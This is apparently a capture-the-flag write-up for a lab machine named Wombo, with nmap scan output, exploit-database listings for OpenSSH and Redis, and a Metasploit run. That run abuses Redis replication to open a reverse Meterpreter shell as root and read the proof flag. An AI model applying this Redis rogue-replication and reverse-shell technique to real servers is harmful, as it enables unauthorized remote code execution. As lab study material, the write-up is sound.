Wombo
Intro
# Nmap 7.94SVN scan initiated Fri Mar 29 09:30:46 2024 as: nmap -sC -sV -vv -oA nmap/initial wombo.pg
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.1 \d\d\d (?:[^\r\n]*\r\n(?!\r\n))*?.*\r\nServer: Virata-EmWeb/R([\d_]+)\r\nContent-Type: text/html; ?charset=UTF-8\r\nExpires: .*<title>HP (Color |)LaserJet ([\w._ -]+) '
Nmap scan report for wombo.pg (192.168.172.69)
Host is up, received echo-reply ttl 61 (0.042s latency).
Scanned at 2024-03-29 09:30:47 CDT for 24s
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 09:80:39:ef:3f:61:a8:d9:e6:fb:04:94:23:c9:ef:a8 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGBXRhQCez7/IOdnHzLYdpVtWWRMN/7bUR/C3T/W6V9DwlKUS2AfdncLdLwqnx61jODFdXDrTdEdTAtK4MHuXt/UOLDXr1SOfUHYQbZd1rmpMaeB3qOKfoVP7NMp2Ga68kT/9NvBphakYXRWw4C7RS0N+4YWU/BjSyMTIdnhJX05lC5Uyljg7FliJ7d3J/CtF98I6Oo5u/Eb2/5BB45/1IuM6R7BGCDOpIs6po1FyEk8gFktbB+INGATdBPxvmAOX6G7m/R491a9/QtaF8wrgsjS3fQftoiW8vwcaom8Bmu94xZ9pZq0Dgt9VWQz241T5dGQrp57s6Djl/V83/qGFP
| 256 83:f8:6f:50:7a:62:05:aa:15:44:10:f5:4a:c2:f5:a6 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLg0oQ1t4NCz+KWPtrCjgDf+qjW2Vb4oOc/eM21vT9rIPJa//rO0LFT8czDxcWFU9HMSEohfSm8emC4lShgGrY4=
| 256 1e:2b:13:30:5c:f1:31:15:b4:e8:f3:d2:c4:e8:05:b5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPS81xs7EU6k92rNFdmsDF7qcRDxDILJUeva18aKW1GV
53/tcp closed domain reset ttl 61
80/tcp open http syn-ack ttl 61 nginx 1.10.3
|_http-title: Welcome to nginx!
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.3
8080/tcp open http-proxy syn-ack ttl 61
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home | NodeBB
|_http-favicon: Unknown favicon MD5: 152FF7D5AE5BDB84B33D4DCA31EB7CD3
| http-robots.txt: 3 disallowed entries
|_/admin/ /reset/ /compose
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| X-DNS-Prefetch-Control: off
| X-Frame-Options: SAMEORIGIN
| X-Download-Options: noopen
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Referrer-Policy: strict-origin-when-cross-origin
| X-Powered-By: NodeBB
| set-cookie: _csrf=FrVAVZmax3Bh4eITxK1YpdTU; Path=/
| Content-Type: text/html; charset=utf-8
| Content-Length: 11098
| ETag: W/"2b5a-d4cpxIx7F4gKsmtHDO3klQzqrG0"
| Vary: Accept-Encoding
| Date: Fri, 29 Mar 2024 14:30:59 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en-GB" data-dir="ltr" style="direction: ltr;" >
| <head>
| <title>Not Found | NodeBB</title>
| <meta name="viewport" content="width=device-width, initial-scale=1.0" />
| <meta name="content-type" content="text/html; charset=UTF-8" />
| <meta name="apple-mobile-web-app-capable" content="yes" />
| <meta name="mobile-web-app-capable" content="yes" />
| <meta property="og:site_n
| GetRequest:
| HTTP/1.1 200 OK
| X-DNS-Prefetch-Control: off
| X-Frame-Options: SAMEORIGIN
| X-Download-Options: noopen
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Referrer-Policy: strict-origin-when-cross-origin
| X-Powered-By: NodeBB
| set-cookie: _csrf=e_Gw9hiHeqzrq47l7lnpZMxh; Path=/
| Content-Type: text/html; charset=utf-8
| Content-Length: 18181
| ETag: W/"4705-Whn/BeeEWdcGXAmiDfsThfeSkvw"
| Vary: Accept-Encoding
| Date: Fri, 29 Mar 2024 14:30:58 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en-GB" data-dir="ltr" style="direction: ltr;" >
| <head>
| <title>Home | NodeBB</title>
| <meta name="viewport" content="width=device-width, initial-scale=1.0" />
| <meta name="content-type" content="text/html; charset=UTF-8" />
| <meta name="apple-mobile-web-app-capable" content="yes" />
| <meta name="mobile-web-app-capable" content="yes" />
| <meta property="og:site_name" content
| HTTPOptions:
| HTTP/1.1 200 OK
| X-DNS-Prefetch-Control: off
| X-Frame-Options: SAMEORIGIN
| X-Download-Options: noopen
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Referrer-Policy: strict-origin-when-cross-origin
| X-Powered-By: NodeBB
| Allow: GET,HEAD
| Content-Type: text/html; charset=utf-8
| Content-Length: 8
| ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
| Vary: Accept-Encoding
| Date: Fri, 29 Mar 2024 14:30:58 GMT
| Connection: close
| GET,HEAD
| RTSPRequest:
| HTTP/1.1 400 Bad Request
|_ Connection: close
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=3/29%Time=6606D0A2%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,34B2,"HTTP/1\.1\x20200\x20OK\r\nX-DNS-Prefetch-Control:\x20
SF:off\r\nX-Frame-Options:\x20SAMEORIGIN\r\nX-Download-Options:\x20noopen\
SF:r\nX-Content-Type-Options:\x20nosniff\r\nX-XSS-Protection:\x201;\x20mod
SF:e=block\r\nReferrer-Policy:\x20strict-origin-when-cross-origin\r\nX-Pow
SF:ered-By:\x20NodeBB\r\nset-cookie:\x20_csrf=e_Gw9hiHeqzrq47l7lnpZMxh;\x2
SF:0Path=/\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Leng
SF:th:\x2018181\r\nETag:\x20W/\"4705-Whn/BeeEWdcGXAmiDfsThfeSkvw\"\r\nVary
SF::\x20Accept-Encoding\r\nDate:\x20Fri,\x2029\x20Mar\x202024\x2014:30:58\
SF:x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\r\n<html\x20la
SF:ng=\"en-GB\"\x20data-dir=\"ltr\"\x20style=\"direction:\x20ltr;\"\x20\x2
SF:0>\r\n<head>\r\n\t<title>Home\x20\|\x20NodeBB</title>\r\n\t<meta\x20nam
SF:e=\"viewport\"\x20content=\"width=device-width,\x20initial-scale&#
SF:x3D;1\.0\"\x20/>\n\t<meta\x20name=\"content-type\"\x20content=\"text/ht
SF:ml;\x20charset=UTF-8\"\x20/>\n\t<meta\x20name=\"apple-mobile-web-app-ca
SF:pable\"\x20content=\"yes\"\x20/>\n\t<meta\x20name=\"mobile-web-app-capa
SF:ble\"\x20content=\"yes\"\x20/>\n\t<meta\x20property=\"og:site_name\"\x2
SF:0content")%r(HTTPOptions,1BF,"HTTP/1\.1\x20200\x20OK\r\nX-DNS-Prefetch-
SF:Control:\x20off\r\nX-Frame-Options:\x20SAMEORIGIN\r\nX-Download-Options
SF::\x20noopen\r\nX-Content-Type-Options:\x20nosniff\r\nX-XSS-Protection:\
SF:x201;\x20mode=block\r\nReferrer-Policy:\x20strict-origin-when-cross-ori
SF:gin\r\nX-Powered-By:\x20NodeBB\r\nAllow:\x20GET,HEAD\r\nContent-Type:\x
SF:20text/html;\x20charset=utf-8\r\nContent-Length:\x208\r\nETag:\x20W/\"8
SF:-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg\"\r\nVary:\x20Accept-Encoding\r\nDate:\x20
SF:Fri,\x2029\x20Mar\x202024\x2014:30:58\x20GMT\r\nConnection:\x20close\r\
SF:n\r\nGET,HEAD")%r(RTSPRequest,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\
SF:nConnection:\x20close\r\n\r\n")%r(FourOhFourRequest,1514,"HTTP/1\.1\x20
SF:404\x20Not\x20Found\r\nX-DNS-Prefetch-Control:\x20off\r\nX-Frame-Option
SF:s:\x20SAMEORIGIN\r\nX-Download-Options:\x20noopen\r\nX-Content-Type-Opt
SF:ions:\x20nosniff\r\nX-XSS-Protection:\x201;\x20mode=block\r\nReferrer-P
SF:olicy:\x20strict-origin-when-cross-origin\r\nX-Powered-By:\x20NodeBB\r\
SF:nset-cookie:\x20_csrf=FrVAVZmax3Bh4eITxK1YpdTU;\x20Path=/\r\nContent-Ty
SF:pe:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x2011098\r\nETag:
SF:\x20W/\"2b5a-d4cpxIx7F4gKsmtHDO3klQzqrG0\"\r\nVary:\x20Accept-Encoding\
SF:r\nDate:\x20Fri,\x2029\x20Mar\x202024\x2014:30:59\x20GMT\r\nConnection:
SF:\x20close\r\n\r\n<!DOCTYPE\x20html>\r\n<html\x20lang=\"en-GB\"\x20data-
SF:dir=\"ltr\"\x20style=\"direction:\x20ltr;\"\x20\x20>\r\n<head>\r\n\t<ti
SF:tle>Not\x20Found\x20\|\x20NodeBB</title>\r\n\t<meta\x20name=\"viewport\
SF:"\x20content=\"width=device-width,\x20initial-scale=1\.0\"\x2
SF:0/>\n\t<meta\x20name=\"content-type\"\x20content=\"text/html;\x20charse
SF:t=UTF-8\"\x20/>\n\t<meta\x20name=\"apple-mobile-web-app-capable\"\x20co
SF:ntent=\"yes\"\x20/>\n\t<meta\x20name=\"mobile-web-app-capable\"\x20cont
SF:ent=\"yes\"\x20/>\n\t<meta\x20property=\"og:site_n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 29 09:31:11 2024 -- 1 IP address (1 host up) scanned in 24.15 seconds
Open Ports
22/tcp - OpenSSH 7.4p1 Debian
80/tcp - nginx 1.10.3
6379/tcp - Redis key-value store 5.0.9
8080/tcp - unknown http server
27017/tcp - Mongo DB?
OpenSSH exploits
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Debian OpenSSH - (Authenticated) Remote SELinux Privilege Escalation | linux/remote/6094.txt
OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
Additional NMAP results
6379/tcp open redis syn-ack ttl 61 Redis key-value store 5.0.9
8080/tcp open http-proxy syn-ack ttl 61
27017/tcp open mongod? syn-ack ttl 61 Redis exploits
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Redis - Replication Code Execution (Metasploit) | linux/remote/48272.rb
Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit) | linux/remote/47195.rb
Redis 5.0 - Denial of Service | linux/dos/44908.txt
Redis-cli < 5.0 - Buffer Overflow (PoC) | linux/local/44904.py
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Initial Foothold
msf6 exploit(linux/redis/redis_replication_cmd_exec) > run
[*] Started reverse TCP handler on 192.168.45.197:80
[*] 192.168.172.69:6379 - Compile redis module extension file
[+] 192.168.172.69:6379 - Payload generated successfully!
[*] 192.168.172.69:6379 - Listening on 192.168.45.197:6379
[*] 192.168.172.69:6379 - Rogue server close...
[*] 192.168.172.69:6379 - Sending command to trigger payload.
[*] Sending stage (3045380 bytes) to 192.168.172.69
[*] Meterpreter session 1 opened (192.168.45.197:80 -> 192.168.172.69:41234) at 2024-03-29 10:10:52 -0500
[!] 192.168.172.69:6379 - This exploit may require manual cleanup of './hcwoot.so' on the target
meterpreter > getuid
Server username: root
meterpreter > shell
Process 1121 created.
Channel 1 created.
whoami
root
cat /root/proof.txt
bdca7f701911d77776b59652397c383bPrivilege Escalation
No escalation required
Last updated